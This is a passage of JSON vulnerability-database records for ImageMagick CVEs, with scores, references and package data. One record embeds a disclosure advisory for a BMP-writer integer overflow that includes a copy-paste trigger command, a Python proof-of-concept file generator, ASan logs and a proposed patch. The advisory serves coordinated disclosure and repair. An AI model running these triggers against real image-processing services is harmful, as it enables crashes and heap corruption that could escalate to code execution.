"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:26:22Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vpxv-r9pg-7gpr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25898", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25898" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442102", "reference_id": "2442102", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442102" }, { "reference_url": "https://github.com/advisories/GHSA-vpxv-r9pg-7gpr", "reference_id": "GHSA-vpxv-r9pg-7gpr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vpxv-r9pg-7gpr" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25898", "GHSA-vpxv-r9pg-7gpr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-emmr-15qp-vfah" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21918?format=api", "vulnerability_id": "VCID-f1zu-xb4j-8qhp", "summary": "ImageMagick has a heap buffer over-read in its MAP image decoder\nA heap buffer over-read vulnerability exists in the MAP image decoder when processing crafted MAP files, potentially leading to crashes or unintended memory disclosure during image decoding.\n\n```\n=================================================================\n==4070926==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000002b31 at pc 0x56517afbd910 bp 0x7ffc59e90000 sp 0x7ffc59e8fff0\nREAD of size 1 at 0x502000002b31 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25987.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25987.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25987", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03385", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03398", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03275", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03265", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03289", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0331", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03339", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0338", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03359", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03354", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03334", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03346", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25987" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25987", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25987" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-42p5-62qq-mmh7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:07:26Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-42p5-62qq-mmh7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25987", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25987" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442115", "reference_id": "2442115", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442115" }, { "reference_url": "https://github.com/advisories/GHSA-42p5-62qq-mmh7", "reference_id": "GHSA-42p5-62qq-mmh7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-42p5-62qq-mmh7" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25987", "GHSA-42p5-62qq-mmh7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f1zu-xb4j-8qhp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28988?format=api", "vulnerability_id": "VCID-f6pf-5jnz-fkd1", "summary": "ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride → heap buffer overflow\n## Summary\n\nA 32-bit integer overflow in the BMP encoder’s scanline-stride computation collapses `bytes_per_line` (stride) to a tiny value while the per-row writer still emits `3 × width` bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines.\n\n- **Impact:** Attacker-controlled heap out-of-bounds (OOB) write during conversion **to BMP**.\n \n- **Surface:** Typical upload → normalize/thumbnail → `magick ... out.bmp` workers.\n \n- **32-bit:** **Vulnerable** (reproduced with ASan).\n \n- **64-bit:** Safe from this specific integer overflow (IOF) by arithmetic, but still add product/size guards.\n \n- **Proposed severity:** **Critical 9.8** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n \n\n---\n\n## Scope & Affected Builds\n\n- **Project:** ImageMagick (BMP writer path, `WriteBMPImage` in `coders/bmp.c`).\n \n- **Commit under test:** `3fcd081c0278427fc0e8ac40ef75c0a1537792f7`\n \n- **Version string from the run:** `ImageMagick 7.1.2-0 Q8 i686 9bde76f1d:20250712`\n \n- **Architecture:** 32-bit i686 (**`sizeof(size_t) == 4`**) with ASan/UBSan.\n \n- **Note on other versions:** Any release/branch with the same stride arithmetic and row loop is likely affected on 32-bit.\n \n\n---\n\n## Root Cause (with code anchors)\n\n### Stride computation (writer)\n\n```c\nbytes_per_line = 4 * ((image->columns * bmp_info.bits_per_pixel + 31) / 32);\n```\n\n### Per-row base and 24-bpp loop (writer)\n\n```c\nq = pixels + ((ssize_t)image->rows - y - 1) * (ssize_t)bytes_per_line;\nfor (x = 0; x < (ssize_t)image->columns; x++) {\n *q++ = B(...); *q++ = G(...); *q++ = R(...); // writes 3 * width bytes\n}\n```\n\n### Allocation (writer)\n\n```c\npixel_info = AcquireVirtualMemory(image->rows,\n MagickMax(bytes_per_line, image->columns + 256UL) * sizeof(*pixels));\npixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);\n```\n\n### Dimension “caps” (insufficient)\n\nThe writer rejects dimensions that don’t round-trip through `signed int`, but both overflow thresholds below are **≤ INT_MAX** on 32-bit, so the caps **do not prevent** the bug.\n\n---\n\n## Integer-Overflow Analysis (32-bit `size_t`)\n\nStride formula for 24-bpp:\n\n```\nbytes_per_line = 4 * ((width * 24 + 31) / 32)\n```\n\nThere are **two independent overflow hazards** on 32-bit:\n\n1. **Stage-1 multiply+add** in `(width * 24 + 31)` \n Overflow iff `width > ⌊(0xFFFFFFFF − 31) / 24⌋ = 178,956,969` \n → at **width ≥ 178,956,970** the numerator wraps small before `/32`, producing a **tiny** `bytes_per_line`.\n \n2. **Stage-2 final ×4** after the division \n Let `q = (width * 24 + 31) / 32`. Final `×4` overflows iff `q > 0x3FFFFFFF`. \n Solving gives **width ≥ 1,431,655,765 (0x55555555)**.\n \n\nBoth thresholds are **below** `INT_MAX` (≈2.147e9), so “int caps” don’t help.\n\n**Mismatch predicate (guaranteed OOB when overflowed):** \nPer-row write for 24-bpp is `row_bytes = 3*width`. Safety requires `row_bytes ≤ bytes_per_line`. \nUnder either overflow, `bytes_per_line` collapses → `3*width > bytes_per_line` holds → **OOB-write**.\n\n---\n\n## Concrete Demonstration\n\nChosen width: **`W = 178,957,200`** (just over Stage-1 bound)\n\n- Stage-1: `24*W + 31 = 4,294,972,831 ≡ 0x0000159F (mod 2^32)` → **5535**\n \n- Divide by 32: `5535 / 32 = 172`\n \n- Multiply by 4: `bytes_per_line = 172 * 4 = **688** bytes` ← tiny stride\n \n- Per-row data (24-bpp): `row_bytes = 3*W = **536,871,600** bytes`\n \n- Allocation used: `MagickMax(688, W+256) = **178,957,456** bytes`\n \n- **Immediate OOB**: first row writes ~536MB into a 178MB region, starting at a base advanced by only 688 bytes.\n \n---\n\n## Observed Result (ASan excerpt)\n\n```\nERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490\nWRITE of size 1 in WriteBMPImage coders/bmp.c:2309\n...\nallocated by:\n AcquireVirtualMemory MagickCore/memory.c:747\n WriteBMPImage coders/bmp.c:2092\n```\n\n- Binary: **ELF 32-bit i386**, Q8, non-HDRI\n \n- Resources set to permit execution of the writer path (defense-in-depth limits relaxed for repro)\n \n\n---\n\n## Exploitability & Risk\n\n- **Primitive:** Large, contiguous, attacker-controlled heap overwrite beginning at the scanline slot.\n \n- **Control:** Overwrite bytes are sourced from attacker-supplied pixels (e.g., crafted input image to be converted to BMP).\n \n- **Likely deployment:** Server-side, non-interactive conversion pipelines (UI:N).\n \n- **Outcome:** At minimum, deterministic crash (DoS). On many 32-bit allocators, well-understood heap shaping can escalate to **RCE**.\n \n\n**Note on 64-bit:** Without integer overflow, `bytes_per_line = 4 * ceil((3*width)/4) ≥ 3*width`, so the mismatch doesn’t arise. Still add product/size checks to prevent DoS and future refactors.\n\n---\n\n## Reproduction (copy-paste triager script)\n\n**Test Environment:**\n\n- `docker run -it --rm --platform linux/386 debian:11 bash`\n \n- Install deps: `apt-get update && apt-get install -y build-essential git autoconf automake libtool pkg-config python3`\n \n- Clone & checkout: ImageMagick `7.1.2-0` → commit `3fcd081c0278427f...`\n \n- Configure 32-bit Q8 non-HDRI with ASan/UBSan (summary):\n\n```bash\n./configure \\\n --host=i686-pc-linux-gnu \\\n --build=x86_64-pc-linux-gnu \\\n --disable-dependency-tracking \\\n --disable-silent-rules \\\n --disable-shared \\\n --disable-openmp \\\n --disable-docs \\\n --without-x \\\n --without-perl \\\n --without-magick-plus-plus \\\n --without-lqr \\\n --without-zstd \\\n --without-tiff \\\n --with-quantum-depth=8 \\\n --disable-hdri \\\n CFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n CXXFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n LDFLAGS=\"-fsanitize=address,undefined\"\n\nmake -j\"$(nproc)\"\n```\n- Runtime limits to exercise writer:\n\n```bash\nexport MAGICK_WIDTH_LIMIT=200000000\nexport MAGICK_HEIGHT_LIMIT=200000000\nexport MAGICK_TEMPORARY_PATH=/tmp\nexport TMPDIR=/tmp\nexport ASAN_OPTIONS=\"detect_leaks=0:malloc_context_size=20:alloc_dealloc_mismatch=0\"\n```\n\n**One-liner trigger (no input file):**\n\n```bash\nW=178957200\n./utilities/magick \\\n -limit width 200000000 -limit height 200000000 \\\n -limit memory 268435456 -limit map 0 -limit disk 200000000000 \\\n -limit thread 1 \\\n -size ${W}x1 xc:black -type TrueColor -define bmp:format=bmp3 BMP3:/dev/null\n```\n\n**Expected:** ASan heap-buffer-overflow in `WriteBMPImage` (will be provided in a private gist link).\n\n**Alternate PoC (raw PPM generator):**\n\n```python\n#!/usr/bin/env python3\nW, H, MAXV = 180_000_000, 1, 255 \n# W > 178,956,969\nwith open(\"huge.ppm\", \"wb\") as f:\n f.write(f\"P6\\n{W} {H}\\n{MAXV}\\n\".encode(\"ascii\"))\n chunk = (b\"\\x41\\x42\\x43\") * (1024*1024)\n remaining = 3 * W\n while remaining:\n n = min(remaining, len(chunk))\n f.write(chunk[:n]); remaining -= n\n# Then: magick huge.ppm out.bmp\n```\n\n---\n\n## Proposed Severity\n\n- **Primary vector (server auto-convert):** `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` → **9.8 Critical**\n \n- **If strictly CLI/manual conversion:** `UI:R` → **8.8 High**\n \n\n---\n\n## Maintainer Pushbacks — Pre-empted\n\n- **“MagickMax makes allocation large.”** The row **base** advances by **overflowed `bytes_per_line`**, causing row overlap and eventual region exit regardless of total allocation size.\n \n- **“We’re 64-bit only.”** Code is still incorrect for 32-bit consumers/cross-compiles; also add product guards on 64-bit for correctness/DoS.\n \n- **“Resource policy blocks large images.”** That’s environment-dependent defense-in-depth; arithmetic must be correct.\n \n---\n\n## Remediation (Summary)\n\nAdd checked arithmetic around stride computation and enforce a per-row invariant so that the number of bytes emitted per row (row_bytes) always fits within the computed stride (bytes_per_line). Guard multiplication/addition and product computations used for header fields and allocation sizes, and fail early with a clear WidthOrHeightExceedsLimit/ResourceLimitError when values exceed safe bounds.\n\nConcretely:\n\n- Validate width and bits_per_pixel before the stride formula to ensure (width*bpp + 31) cannot overflow a size_t.\n- Compute row_bytes for the chosen bpp and assert row_bytes <= bytes_per_line.\n- Bound rows * stride before allocating and ensure biSizeImage (DIB 32-bit) cannot overflow.\n\nA full suggested guarded implementation is provided in Appendix A — Full patch (for maintainers).\n\n---\n\n## Regression Tests to Include (PR-friendly)\n\n1. **32-bit overflow repros** (with ASan):\n \n - `rows=1`, `width ≥ 178,956,970`, `bpp=24` → now cleanly errors.\n \n - `rows=2`, same bound → no row overlap; clean error.\n \n2. **64-bit sanity:** Medium images (e.g., `8192×4096`, 24-bpp) round-trip; header’s `biSizeImage = rows * bytes_per_line`.\n \n3. **Packed bpp (1/4/8):** Validate `row_bytes = (width*bpp+7)/8` (guarded), 4-pad, and **payload ≤ stride** holds.\n\n---\n\n## Attachments (private BMP_Package) \nProvided with report: README.md, poc_ppm_generator.py, repro_commands.sh, full_asan_bmp_crash.txt, appendix_a_patch_block.c. (Private gist link with package provided separately.)\n\n---\n\n## Disclosure & Coordination\n\n- **Reporter:** Lumina Mescuwa\n \n- **Tested on:** i686 Linux container (details in Repro)\n \n- **Timeline:** August 19th, 2025\n \n\n---\n\n## Appendices\n\n### Appendix A — Patch block tailored to `bmp.c`\n\n**Where this hooks in (current code):**\n\n- Stride is computed here: `bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);`\n \n- Header uses `bmp_info.image_size=(unsigned int) (bytes_per_line*image->rows);`\n \n- Allocation uses `AcquireVirtualMemory(image->rows, MagickMax(bytes_per_line, image->columns+256UL)*sizeof(*pixels));`\n \n- 24-bpp row loop writes pixels then zero-pads up to `bytes_per_line` (so the per-row slot size matters): `for (x=3L*(ssize_t)image->columns; x < (ssize_t)bytes_per_line; x++) *q++=0x00;`\n \n\n---\n\n## Suggested Patch (minimal surface, guards + invariant)\n\nI recommend this **in place of** the existing `bytes_per_line` assignment and the subsequent `bmp_info.image_size` / allocation block. Keep your macros and local variables as-is.\n\n```c\n/* --- PATCH BEGIN: guarded stride, per-row invariant, and product checks --- */\n\n/* 1) Guard the original stride arithmetic (preserve behavior, add checks). */\nif (bmp_info.bits_per_pixel == 0 ||\n (size_t)image->columns > (SIZE_MAX - 31) / (size_t)bmp_info.bits_per_pixel)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\nsize_t _tmp = (size_t)image->columns * (size_t)bmp_info.bits_per_pixel + 31;\n/* Divide first; then check the final ×4 won't overflow. */\n_tmp /= 32;\nif (_tmp > (SIZE_MAX / 4))\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\nbytes_per_line = 4 * _tmp; /* same formula as before, now checked */\n\n/* 2) Compute the actual data bytes written per row for the chosen bpp. */\nsize_t row_bytes;\nif (bmp_info.bits_per_pixel == 1 || bmp_info.bits_per_pixel == 4 || bmp_info.bits_per_pixel == 8) {\n /* packed: ceil(width*bpp/8) */\n if ((size_t)image->columns > (SIZE_MAX - 7) / (size_t)bmp_info.bits_per_pixel)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n row_bytes = (((size_t)image->columns * (size_t)bmp_info.bits_per_pixel) + 7) >> 3;\n} else {\n /* 16/24/32 bpp: (bpp/8) * width */\n size_t bpp_bytes = (size_t)bmp_info.bits_per_pixel / 8;\n if (bpp_bytes == 0 || (size_t)image->columns > SIZE_MAX / bpp_bytes)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n row_bytes = bpp_bytes * (size_t)image->columns;\n}\n\n/* 3) Per-row safety invariant: the payload must fit the stride. */\nif (row_bytes > bytes_per_line)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\n\n/* 4) Guard header size and allocation products. */\nif ((size_t)image->rows == 0)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\n/* biSizeImage = rows * bytes_per_line (DIB field is 32-bit) */\nif (bytes_per_line > 0xFFFFFFFFu / (size_t)image->rows)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\nbmp_info.image_size = (unsigned int)(bytes_per_line * (size_t)image->rows);\n\n/* Allocation count = rows * stride_used, with existing MagickMax policy. */\nsize_t _stride = MagickMax(bytes_per_line, (size_t)image->columns + 256UL);\nif (_stride > SIZE_MAX / (size_t)image->rows)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\n\npixel_info = AcquireVirtualMemory((size_t)image->rows, _stride * sizeof(*pixels));\nif (pixel_info == (MemoryInfo *) NULL)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\npixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);\n\n/* Optional: keep zeroing aligned to computed header size. */\n(void) memset(pixels, 0, (size_t) bmp_info.image_size);\n\n/* --- PATCH END --- */\n```\n\n### Why this is the right spot?\n\n- It **replaces** the unguarded stride line you currently have, without changing the algorithm (still `4*((W*bpp+31)/32)`). \n \n- It **fixes the header** (`biSizeImage`) to be a checked product, instead of a potentially wrapped multiplication. \n \n- It **guards allocation** where you presently allocate `rows × MagickMax(bytes_per_line, columns+256)`. \n \n- The invariant `row_bytes ≤ bytes_per_line` ensures your 24-bpp emission loop (writes 3 bytes/pixel, then pads to `bytes_per_line`) can never exceed the per-row slot the code relies on. \n \n\n---\n\n## Notes\n\n- **Behavior preserved**: The stride value for normal images is unchanged; only pathological integer states are rejected. \n \n- **Header consistency**: `biSizeImage = rows * bytes_per_line` remains true by construction, but now cannot overflow a 32-bit DIB field. \n \n- **Defensive alignment**: If you prefer, you can compute `bytes_per_line` as `((row_bytes + 3) & ~3U)`; it’s equivalent and may read clearer, but I kept the original formula with guards to minimize diff.\n \n\nA slightly larger “helpers” variant (with `safe_mul_size` / `safe_add_size` utilities) also comes to mind, but the block above is the tightest patch that closes the 32-bit IOF→OOB class without touching unrelated code paths.\n\n\n\n### Appendix B — Arithmetic Worked Example (W=178,957,200)\n\n- `(24W + 31) mod 2^32 = 5535`\n \n- `bytes_per_line = 4 * (5535/32) = 688`\n \n- `row_bytes (24-bpp) = 536,871,600`\n \n- Allocation via `MagickMax = 178,957,456` → immediate row 0 out-of-bounds.\n \n\n### Appendix C — Raw ASan Log (trimmed)\n\n```\n=================================================================\n==49178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490\nWRITE of size 1 at 0x6eaac490 thread T0\n #0 0xed2788 in WriteBMPImage coders/bmp.c:2309\n #1 0x13da32c in WriteImage MagickCore/constitute.c:1342\n #2 0x13dc657 in WriteImages MagickCore/constitute.c:1564\n0x6eaac490 is located 0 bytes to the right of 178957456-byte region\nallocated by thread T0 here:\n #0 0x408e30ab in __interceptor_posix_memalign\n #1 0xd03305 in AcquireVirtualMemory MagickCore/memory.c:747\n #2 0xecd597 in WriteBMPImage coders/bmp.c:2092\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57803.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57803.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57803", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.23947", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24279", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24095", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24152", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24194", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24176", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24244", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24131", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24065", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24096", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00082", 